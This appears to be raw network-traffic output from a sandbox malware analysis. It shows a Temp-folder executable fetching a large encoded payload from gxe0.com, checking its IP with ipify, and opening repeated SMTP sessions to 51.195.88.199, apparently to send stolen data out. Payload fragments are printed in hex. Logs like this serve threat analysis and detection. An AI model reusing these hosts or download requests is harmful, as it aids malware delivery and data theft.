                                                                                                                              Nov 13, 2024 16:31:56.634397030 CET5874999851.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:31:57.124977112 CET5874999851.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:31:57.336260080 CET5874999851.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:31:57.337466955 CET49998587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:12.514672041 CET49998587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:12.520471096 CET5874999851.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:12.757272005 CET5874999851.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:12.757672071 CET49998587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:12.757975101 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:12.763537884 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:12.763693094 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:13.574069977 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:13.574223042 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:13.579103947 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:13.819650888 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:13.820188046 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:13.825304031 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:14.077152014 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:14.083352089 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:14.088423014 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:14.344640017 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:14.344698906 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:14.344738007 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:14.344794035 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:14.345832109 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:14.350713968 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:14.590715885 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:14.591506004 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:14.596529961 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:14.836697102 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:14.837016106 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:14.842017889 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:15.087905884 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:15.088130951 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:15.093697071 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:15.339701891 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:15.339903116 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:15.344810009 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:15.585180044 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:15.585669994 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:15.590800047 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:15.837435007 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:15.837718964 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:15.863526106 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.104465008 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.104752064 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:16.104825020 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:16.104825020 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:16.104964018 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:16.105900049 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:16.109680891 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.109707117 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.109720945 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.109743118 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:16.110250950 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.110673904 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:16.110757113 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.110812902 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.110816002 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:16.110831976 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.110846043 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.110855103 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:16.110861063 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.110877991 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:16.110888958 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:16.110913038 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:16.110918999 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.110961914 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.110965967 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:16.111006975 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:16.115044117 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.115094900 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:16.115138054 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.115181923 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:16.115389109 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.115446091 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:16.116785049 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.116832018 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:16.116952896 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.116992950 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:16.117626905 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.117748976 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:16.120619059 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.120691061 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:16.121484041 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.121531963 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:16.121887922 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.121934891 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:16.122458935 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.122538090 CET49999587192.168.2.551.195.88.199
                                                                                                                              Nov 13, 2024 16:32:16.122704029 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.122999907 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.123013020 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.123025894 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.123125076 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.123137951 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.123151064 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.123173952 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.123186111 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.123198032 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.123280048 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.125633955 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.125730038 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.125742912 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.126296997 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.126348972 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.126363039 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.126374006 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.126389027 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.126673937 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.126694918 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.126708031 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.126719952 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.127438068 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.127526045 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.127540112 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.127568007 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.127608061 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.127620935 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.627826929 CET5874999951.195.88.199192.168.2.5
                                                                                                                              Nov 13, 2024 16:32:16.670675993 CET49999587192.168.2.551.195.88.199
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Nov 13, 2024 16:28:01.525623083 CET5623853192.168.2.51.1.1.1
                                                                                                                              Nov 13, 2024 16:28:01.556653023 CET53562381.1.1.1192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:13.520138979 CET6375653192.168.2.51.1.1.1
                                                                                                                              Nov 13, 2024 16:28:13.527774096 CET53637561.1.1.1192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:17.699949980 CET6476453192.168.2.51.1.1.1
                                                                                                                              Nov 13, 2024 16:28:17.714006901 CET53647641.1.1.1192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:25.453807116 CET5791153192.168.2.51.1.1.1
                                                                                                                              Nov 13, 2024 16:28:25.461555004 CET53579111.1.1.1192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:33.704416990 CET5773053192.168.2.51.1.1.1
                                                                                                                              Nov 13, 2024 16:28:33.712285995 CET53577301.1.1.1192.168.2.5
                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Nov 13, 2024 16:28:01.525623083 CET192.168.2.51.1.1.10xc04aStandard query (0)gxe0.comA (IP address)IN (0x0001)false
                                                                                                                              Nov 13, 2024 16:28:13.520138979 CET192.168.2.51.1.1.10x1c14Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                              Nov 13, 2024 16:28:17.699949980 CET192.168.2.51.1.1.10x740eStandard query (0)s82.gocheapweb.comA (IP address)IN (0x0001)false
                                                                                                                              Nov 13, 2024 16:28:25.453807116 CET192.168.2.51.1.1.10xbfeeStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                              Nov 13, 2024 16:28:33.704416990 CET192.168.2.51.1.1.10xa110Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Nov 13, 2024 16:28:01.556653023 CET1.1.1.1192.168.2.50xc04aNo error (0)gxe0.com198.252.105.91A (IP address)IN (0x0001)false
                                                                                                                              Nov 13, 2024 16:28:13.527774096 CET1.1.1.1192.168.2.50x1c14No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                              Nov 13, 2024 16:28:13.527774096 CET1.1.1.1192.168.2.50x1c14No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                              Nov 13, 2024 16:28:13.527774096 CET1.1.1.1192.168.2.50x1c14No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                              Nov 13, 2024 16:28:17.714006901 CET1.1.1.1192.168.2.50x740eNo error (0)s82.gocheapweb.com51.195.88.199A (IP address)IN (0x0001)false
                                                                                                                              Nov 13, 2024 16:28:25.461555004 CET1.1.1.1192.168.2.50xbfeeNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                              Nov 13, 2024 16:28:33.712285995 CET1.1.1.1192.168.2.50xa110No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                              • gxe0.com
                                                                                                                              • api.ipify.org
                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.549705198.252.105.91443348C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-13 15:28:02 UTC161OUTGET /yak/233_Wisrysxlfss HTTP/1.1
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Accept: */*
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                              Host: gxe0.com
                                                                                                                              2024-11-13 15:28:02 UTC365INHTTP/1.1 200 OK
                                                                                                                              Connection: close
                                                                                                                              last-modified: Mon, 28 Oct 2024 23:14:08 GMT
                                                                                                                              accept-ranges: bytes
                                                                                                                              content-length: 2562520
                                                                                                                              date: Wed, 13 Nov 2024 15:28:02 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                              2024-11-13 15:28:02 UTC1003INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 51 48 43 59 6b 48 42 41 6e 47 69 4d 6e 46 78 4d 56 4a 52 38 51 44 68 73 67 4a 53 49 67 48 78 49 58 44 68 55 61 49 42 59 61 4a 68 38 52 48 78 49 66 4a 68 77 5a 4a 43 49 6c 44 69 4d 6b 4a 79 4d 66 48 68 6b 61 4a 78 51 51 44 68 41 63 45 53 41 6e 4a 52 30 6c 49 52 51 50 46 69 41 51 4a 52 49 6e 4a 79 49 69 48 53 41 69 49 79 49 52 4a 52 59 63 4a 68 67 6d 48 51 38 52 46 78 49 63 48 42 63 6c 44 78 51 65 44 67 38 58 48 78 77 4f 49 69 45 65 48 52 4d 6a 4a 78 32 6d 72 71 56 5a 49 36 65 78 53 77 51 57 49 42 38 6d 49 43 55 5a 45 79 41 67 70 71 36 6c 57 53 4f 6e 73 55 75 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65
                                                                                                                              Data Ascii: pq6lWSOnsUsQHCYkHBAnGiMnFxMVJR8QDhsgJSIgHxIXDhUaIBYaJh8RHxIfJhwZJCIlDiMkJyMfHhkaJxQQDhAcESAnJR0lIRQPFiAQJRInJyIiHSAiIyIRJRYcJhgmHQ8RFxIcHBclDxQeDg8XHxwOIiEeHRMjJx2mrqVZI6exSwQWIB8mICUZEyAgpq6lWSOnsUupnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbe
                                                                                                                              2024-11-13 15:28:02 UTC14994INData Raw: 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71
                                                                                                                              Data Ascii: muKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uq
                                                                                                                              2024-11-13 15:28:03 UTC16384INData Raw: 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70
                                                                                                                              Data Ascii: 7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mp
                                                                                                                              2024-11-13 15:28:03 UTC16384INData Raw: 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31
                                                                                                                              Data Ascii: qOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1
                                                                                                                              2024-11-13 15:28:03 UTC16384INData Raw: 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35
                                                                                                                              Data Ascii: rmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5
                                                                                                                              2024-11-13 15:28:03 UTC16384INData Raw: 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30
                                                                                                                              Data Ascii: Ke4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0
                                                                                                                              2024-11-13 15:28:03 UTC16384INData Raw: 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a
                                                                                                                              Data Ascii: KSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6Gz
                                                                                                                              2024-11-13 15:28:03 UTC16384INData Raw: 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79
                                                                                                                              Data Ascii: 6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqy
